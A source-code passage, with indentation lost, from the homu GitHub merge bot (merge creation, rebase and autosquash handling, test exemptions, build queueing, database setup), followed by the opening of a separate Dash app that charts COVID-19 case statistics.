' (check `git status` if you got lost).\n'
'5. `git push self {branch} --force-with-lease` *(update this PR)*\n\n'
'You may also read'
' [*Git Rebasing to Resolve Conflicts* by Drew Blessing](http://blessing.io/git/git-rebase/open-source/2015/08/23/git-rebasing-to-resolve-conflicts.html)' # noqa
' for a short tutorial.\n\n'
'Please avoid the ["**Resolve conflicts**" button](https://help.github.com/articles/resolving-a-merge-conflict-on-github/) on GitHub.' # noqa
' It uses `git merge` instead of `git rebase` which makes the PR commit' # noqa
' history more difficult to read.\n\n'
'Sometimes step 4 will complete without asking for resolution. This is'
' usually due to difference between how `Cargo.lock` conflict is'
' handled during merge and rebase. This is normal, and you should still' # noqa
' perform step 5 to update this PR.\n\n'
'</details>\n\n'
).format(branch=state.head_ref.split(':', 1)[1])
if git_cfg['local_git']:
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
utils.silent_call(git_cmd('rebase', '--abort'))
utils.silent_call(git_cmd('merge', '--abort'))
if repo_cfg.get('linear', False):
utils.logged_call(
git_cmd('checkout', '-B', branch, state.head_sha))
try:
args = [base_sha]
if repo_cfg.get('autosquash', False):
args += ['-i', '--autosquash']
utils.logged_call(git_cmd('-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
*args))
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(git_cmd('rebase', '--abort'))
if utils.silent_call(git_cmd('rebase', base_sha)) == 0:
desc = 'Auto-squashing failed'
comment = ''
else:
ap = '<try>' if state.try_ else state.approved_by
text = '\nCloses: #{}\nApproved by: {}'.format(state.num, ap)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email'])) # noqa
utils.logged_call(git_cmd('filter-branch', '-f',
'--msg-filter', msg_code,
'--env-filter', env_code,
'{}..'.format(base_sha)))
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
utils.logged_call(git_cmd(
'checkout',
'-B',
'homu-tmp',
state.head_sha))
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
'-i',
'--autosquash',
'--onto',
merge_base_sha, base_sha))
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
comment = ''
ok = False
if ok:
utils.logged_call(git_cmd('checkout', '-B', branch, base_sha))
try:
subprocess.check_output(
git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'merge',
'heads/homu-tmp',
'--no-ff',
'-m',
merge_msg),
stderr=subprocess.STDOUT,
universal_newlines=True)
except subprocess.CalledProcessError as e:
comment += '<details><summary>Error message</summary>\n\n```text\n' # noqa
comment += e.output
comment += '\n```\n\n</details>'
else:
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature') # noqa
# if we're merging using the GitHub API, we have no way to predict
# with certainty what the final result will be so make sure the caller
# isn't asking us to keep any promises (see also discussions at
# https://github.com/servo/homu/pull/57)
assert ensure_merge_equal is False
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try:
merge_commit = state.get_repo().merge(
branch,
state.head_sha,
merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(
state.get_repo(),
state.head_sha,
'error',
'',
desc,
context='homu')
state.add_comment(':lock: {}\n\n{}'.format(desc, comment))
state.change_labels(LabelEvent.CONFLICT)
return ''
def pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
return utils.silent_call(git_cmd('merge-base', '--is-ancestor',
base_sha, state.head_sha)) == 0
# We could fetch this from GitHub instead, but that API is being deprecated:
# https://developer.github.com/changes/2013-04-25-deprecating-merge-commit-sha/
def get_github_merge_sha(state, repo_cfg, git_cfg):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
if state.mergeable is not True:
return None
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return subprocess.check_output(git_cmd('rev-parse', 'FETCH_HEAD')).decode('ascii').strip() # noqa
def do_exemption_merge(state, logger, repo_cfg, git_cfg, url, check_merge,
reason):
try:
merge_sha = create_merge(
state,
repo_cfg,
state.base_ref,
logger,
git_cfg,
check_merge)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state)) # noqa
traceback.print_exc()
return False
if not merge_sha:
return False
desc = 'Test exempted'
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success',
url, desc, context='homu')
state.add_comment(':zap: {}: {}.'.format(desc, reason))
state.change_labels(LabelEvent.EXEMPTED)
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
def try_travis_exemption(state, logger, repo_cfg, git_cfg):
travis_info = None
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
travis_info = info
break
if travis_info is None or travis_info.state != 'success':
return False
mat = re.search('/builds/([0-9]+)$', travis_info.target_url)
if not mat:
return False
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner,
state.name,
mat.group(1))
try:
res = requests.get(url)
except Exception as ex:
print('* Unable to gather build info from Travis CI: {}'.format(ex))
return False
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if not travis_commit:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if (travis_commit.parents[0]['sha'] == base_sha and
travis_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg,
travis_info.target_url, True,
"merge already tested by Travis CI")
return False
def try_status_exemption(state, logger, repo_cfg, git_cfg):
# If all the builders are status-based, then we can do some checks to
# exempt testing under the following cases:
# 1. The PR head commit has the equivalent statuses set to 'success' and
# it is fully rebased on the HEAD of the target base ref.
# 2. The PR head and merge commits have the equivalent statuses set to
# state 'success' and the merge commit's first parent is the HEAD of
# the target base ref.
if not git_cfg['local_git']:
raise RuntimeError('local_git is required to use status exemption')
statuses_all = set()
# equivalence dict: pr context --> auto context
status_equivalences = {}
for key, value in repo_cfg['status'].items():
context = value.get('context')
pr_context = value.get('pr_context', context)
if context is not None:
statuses_all.add(context)
status_equivalences[pr_context] = context
assert len(statuses_all) > 0
# let's first check that all the statuses we want are set to success
statuses_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_pass.add(status_equivalences[info.context])
if statuses_all != statuses_pass:
return False
# is the PR fully rebased?
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', False,
"pull fully rebased and already tested")
# check if we can use the github merge sha as proof
merge_sha = get_github_merge_sha(state, repo_cfg, git_cfg)
if merge_sha is None:
return False
statuses_merge_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), merge_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_merge_pass.add(status_equivalences[info.context])
merge_commit = state.get_repo().commit(merge_sha)
if (statuses_all == statuses_merge_pass and
merge_commit.parents[0]['sha'] == base_sha and
merge_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', True,
"merge already tested")
return False
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
lazy_debug(logger, lambda: "start_build on {!r}".format(state.get_repo()))
pr = state.get_repo().pull_request(state.num)
assert state.head_sha == pr.head.sha
assert state.base_ref == pr.base.ref
repo_cfg = repo_cfgs[state.repo_label]
builders = []
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
can_try_travis_exemption = False
only_status_builders = True
if 'buildbot' in repo_cfg:
if state.try_:
builders += repo_cfg['buildbot']['try_builders']
else:
builders += repo_cfg['buildbot']['builders']
only_status_builders = False
if 'travis' in repo_cfg:
builders += ['travis']
only_status_builders = False
if 'status' in repo_cfg:
found_travis_context = False
for key, value in repo_cfg['status'].items():
context = value.get('context')
if context is not None:
if state.try_ and not value.get('try', True):
# Skip this builder for tries.
continue
builders += ['status-' + key]
# We have an optional fast path if the Travis test passed
# for a given commit and master is unchanged, we can do
# a direct push.
if context == 'continuous-integration/travis-ci/push':
found_travis_context = True
if found_travis_context and len(builders) == 1:
can_try_travis_exemption = True
if 'checks' in repo_cfg:
builders += [
'checks-' + key
for key, value in repo_cfg['checks'].items()
if 'name' in value or (state.try_ and 'try_name' in value)
]
only_status_builders = False
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
lazy_debug(logger, lambda: "start_build: builders={!r}".format(builders))
if (only_status_builders and state.approved_by and
repo_cfg.get('status_based_exemption', False)):
if can_try_travis_exemption:
if try_travis_exemption(state, logger, repo_cfg, git_cfg):
return True
if try_status_exemption(state, logger, repo_cfg, git_cfg):
return True
merge_sha = create_merge(state, repo_cfg, branch, logger, git_cfg)
lazy_debug(logger, lambda: "start_build: merge_sha={}".format(merge_sha))
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(
state.owner,
state.name,
state.num,
branch,
state.merge_sha))
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
desc = '{} commit {} with merge {}...'.format(
'Trying' if state.try_ else 'Testing',
state.head_sha,
state.merge_sha,
)
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
desc,
context='homu')
if state.try_:
state.add_comment(comments.TryBuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
else:
state.add_comment(comments.BuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
_parents = state.get_repo().commit(state.merge_sha).parents
parent_shas = [x['sha'] for x in _parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(
state.get_repo(),
'tags/homu-tmp',
state.merge_sha,
force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err)) # noqa
return False
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders)) # noqa
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders)) # noqa
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
'{}{}...'.format(msg_1, msg_3),
context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db,
git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
lazy_debug(logger, lambda: "process_queue: state={!r}, building {}"
.format(state, repo_label))
if state.priority < repo.treeclosed:
continue
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'): # noqa
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots,
logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by: # noqa
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
pull_request = state.get_repo().pull_request(state.num)
if pull_request is None or pull_request.mergeable is None:
time.sleep(5)
pull_request = state.get_repo().pull_request(state.num)
mergeable = pull_request is not None and pull_request.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat:
issue_or_commit = '#' + mat.group(1)
else:
issue_or_commit = cause['sha']
else:
issue_or_commit = ''
_blame = ''
if issue_or_commit:
_blame = ' (presumably {})'.format(issue_or_commit)
state.add_comment(
':umbrella: The latest upstream changes{} made this '
'pull request unmergeable. Please [resolve the merge conflicts]' # noqa
'(https://rustc-dev-guide.rust-lang.org/git.html#conflicts).\n\n' # noqa
'*Note that reviewers usually do not review pull requests '
'until merge conflicts are resolved!* Once you resolve '
'the conflicts, you should change the labels applied by '
'bors to indicate that your PR is ready for review. '
'Post this as a comment to change the labels:\n'
'```\n'
'@rustbot modify labels: +S-waiting-on-review -S-waiting-on-author\n' # noqa
'```'
.format(_blame)
)
state.change_labels(LabelEvent.CONFLICT)
state.set_mergeable(mergeable, que=False)
except Exception:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels): # noqa
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = Repository(repo, repo_label, db)
for pull in repo.iter_pulls(state='open'):
db_query(
db,
'SELECT status FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = pull.title
state.body = suppress_pings(pull.body)
state.body = suppress_ignore_block(state.body)
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def process_config(config):
# Replace environment variables
if type(config) == str:
for var in VARIABLES_RE.findall(config):
try:
config = config.replace("${"+var+"}", os.environ[var])
except KeyError:
raise RuntimeError(
f"missing environment variable ${var} "
f"(requested in the configuration file)"
) from None
return config
# Recursively apply the processing
elif type(config) == list:
return [process_config(item) for item in config]
elif type(config) == dict:
return {key: process_config(value) for key, value in config.items()}
# All other values should be returned as-is
else:
return config
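# A minimal illustration of process_config() (the token name is hypothetical):
# assuming VARIABLES_RE matches the ${VAR} placeholders substituted above, and
# with os.environ['HOMU_GH_TOKEN'] = 'abc123',
#     process_config({'github': {'access_token': '${HOMU_GH_TOKEN}'}})
# returns {'github': {'access_token': 'abc123'}}; an unset variable raises
# RuntimeError instead.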
def arguments():
parser = argparse.ArgumentParser(
description='A bot that integrates with GitHub and your favorite '
'continuous integration service')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='Enable more verbose logging')
parser.add_argument(
'-c',
'--config',
action='store',
help='Path to cfg.toml',
default='cfg.toml')
return parser.parse_args()
def main():
global global_cfg
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
if sys.getfilesystemencoding() == 'ascii':
logger.info('You need to set a locale compatible with unicode or homu will choke on Unicode in PR descriptions/titles. See http://stackoverflow.com/a/27931669') # noqa
try:
with open(args.config) as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
# Fall back to cfg.json only if we're using the defaults
if args.config == 'cfg.toml':
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
else:
raise
cfg = process_config(cfg)
global_cfg = cfg
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
cfg_git = cfg.get('git', {})
user_email = cfg_git.get('email')
if user_email is None:
try:
user_email = [x for x in gh.iter_emails() if x['primary']][0]['email'] # noqa
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted') # noqa
user_name = cfg_git.get('name', user.name if user.name else user.login)
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user_name,
'email': user_email,
'ssh_key': cfg_git.get('ssh_key', ''),
'local_git': cfg_git.get('local_git', False),
'cache_dir': cfg_git.get('cache_dir', 'cache')
}
db_file = cfg.get('db', {}).get('file', 'main.db')
db_conn = sqlite3.connect(db_file,
check_same_thread=False,
isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS repos (
repo TEXT NOT NULL,
treeclosed INTEGER NOT NULL,
treeclosed_src TEXT,
UNIQUE (repo)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS retry_log (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
time DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
src TEXT NOT NULL,
msg TEXT NOT NULL
)''')
db_query(db, '''
CREATE INDEX IF NOT EXISTS retry_log_time_index ON retry_log
(repo, time DESC)
''')
# manual DB migration :/
try:
db_query(db, 'SELECT treeclosed_src FROM repos LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE repos ADD COLUMN treeclosed_src TEXT')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
# If test-on-fork is enabled point both the main repo and the fork to
# the same homu "repository". This will allow events coming from both
# GitHub repositories to be processed the same way.
if 'test-on-fork' in repo_cfg:
tof = repo_cfg['test-on-fork']
repo_labels[tof['owner'], tof['name']] = repo_label
repo_states = {}
repos[repo_label] = Repository(None, repo_label, db)
db_query(
db,
'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha FROM pull WHERE repo = ?', # noqa
[repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha in db.fetchall(): # noqa
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = rollup
state.delegate = delegate
builders = []
if merge_sha:
if 'buildbot' in repo_cfg:
builders += repo_cfg['buildbot']['builders']
if 'travis' in repo_cfg:
builders += ['travis']
if 'status' in repo_cfg:
builders += ['status-' + key for key, value in repo_cfg['status'].items() if 'context' in value] # noqa
if 'checks' in repo_cfg:
builders += ['checks-' + key for key, value in repo_cfg['checks'].items() if 'name' in value] # noqa
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(
db,
'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res:
raise KeyError
if state.merge_sha != merge_sha:
raise KeyError
except KeyError:
db_query(
db,
'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', # noqa
[repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try:
state = states[repo_label][num]
except KeyError:
db_query(
db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg) # noqa
os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py') # noqa
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(
target=server.start,
args=[
cfg,
states,
queue_handler,
repo_cfgs,
repos,
logger,
buildbot_slots,
my_username,
db,
repo_labels,
mergeable_que,
gh,
]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
queue_handler()
if __name__ == '__main__':
main()

wuhan.py

#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
""" Visualize Wuhan Corona Virus Stats """
import datetime as dt
import inspect
import io
import math
import os
import platform
import random
import string
import sys
import threading
import time
import cufflinks as cf
import dash
import dash_core_components as dcc
import dash_html_components as dhc
import flask
import numpy as np
import pandas as pd
import plotly.express as px
import requests
__all__ = ['app', 'server', 'client']
auth_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'auth_key')
if not os.path.exists(auth_file):
with open(auth_file, 'w') as o_f:
o_f.write('\n'.join([(''.join(random.choice(string.ascii_letters) for _ in range(256))) for n in range(256)]))
with open(auth_file) as in_file:
auth_tokens = in_file.readlines()[42:69]
code_link = '/code'
ld_link = '/logs'
ld_file = None
status_link = '/status'
kill_link = '/kill/' + auth_tokens[0]
reload_data_link = '/reload/' + auth_tokens[-1]
app_title = 'Wuhan Corona Virus Pandemic Stats'
# noinspection SpellCheckingInspection
URLS = {
'population': 'https://datahub.io/JohnSnowLabs/population-figures-by-country/r/population-figures-by-country-csv'
'.csv',
'cases': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_confirmed_global_narrow.csv?dest'
'=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02=rename&rename'
'-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03=rename&rename'
'-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum&rename-header03'
'=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date&sort-reverse05=on'
'&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on&tagger-default-tag'
'=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1%2Bname&tagger-02-header'
'=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat&tagger-03-tag=%23geo%2Blat'
'&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https%3A%2F%2Fraw.githubusercontent'
'.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data%2Fcsse_covid_19_time_series'
'%2Ftime_series_covid19_confirmed_global.csv',
'deaths': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_deaths_global_narrow.csv?dest'
'=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02=rename&rename'
'-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03=rename&rename'
'-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum&rename-header03'
'=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date&sort-reverse05=on'
'&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on&tagger-default-tag'
'=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1%2Bname&tagger-02-header'
'=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat&tagger-03-tag=%23geo%2Blat'
'&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https%3A%2F%2Fraw.githubusercontent'
'.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data%2Fcsse_covid_19_time_series'
'%2Ftime_series_covid19_deaths_global.csv',
'recovered': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_recovered_global_narrow.csv'
'?dest=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02'
'=rename&rename-oldtag02=%23affected%2Bdate&rename-newtag02=%23date&rename-header02=Date&filter03'
'=rename&rename-oldtag03=%23affected%2Bvalue&rename-newtag03=%23affected%2Binfected%2Bvalue%2Bnum'
'&rename-header03=Value&filter04=clean&clean-date-tags04=%23date&filter05=sort&sort-tags05=%23date'
'&sort-reverse05=on&filter06=sort&sort-tags06=%23country%2Bname%2C%23adm1%2Bname&tagger-match-all=on'
'&tagger-default-tag=%23affected%2Blabel&tagger-01-header=province%2Fstate&tagger-01-tag=%23adm1'
'%2Bname&tagger-02-header=country%2Fregion&tagger-02-tag=%23country%2Bname&tagger-03-header=lat'
'&tagger-03-tag=%23geo%2Blat&tagger-04-header=long&tagger-04-tag=%23geo%2Blon&header-row=1&url=https'
'%3A%2F%2Fraw.githubusercontent.com%2FCSSEGISandData%2FCOVID-19%2Fmaster%2Fcsse_covid_19_data'
'%2Fcsse_covid_19_time_series%2Ftime_series_covid19_recovered_global.csv',
}
EU = ['Austria', 'Belgium', 'Bulgaria', 'Croatia', 'Cyprus', 'Czechia', 'Denmark', 'Estonia', 'Finland', 'France',
'Germany', 'Greece', 'Hungary', 'Ireland', 'Italy', 'Latvia', 'Lithuania', 'Luxembourg', 'Malta', 'Netherlands',
'Poland', 'Portugal', 'Romania', 'Slovakia', 'Slovenia', 'Spain', 'Sweden']
def create_layout(keys: list = None, shown_keys: list = None, ds: str = '', ) -> {str: dhc.Div}:
keys = keys or ['Loading...']
shown_keys = shown_keys or keys[0]
page_title = '{} {}'.format(app_title, ds)
report_date = dt.datetime.now().strftime('%H:%M %d-%b-%Y')
link_style = {'text-decoration': 'none'}
log_link = dhc.A(u'\u2317 ', title='Logs', href=ld_link, target='_blank', style=link_style) if ld_file else ''
return {
'report_date': report_date,
'Loading...': dhc.Div('Loading ...'),
'layout': dhc.Div([
dhc.H3([dhc.A(u'\u2388 ', href='/', style=link_style, title='Refresh'), page_title]),
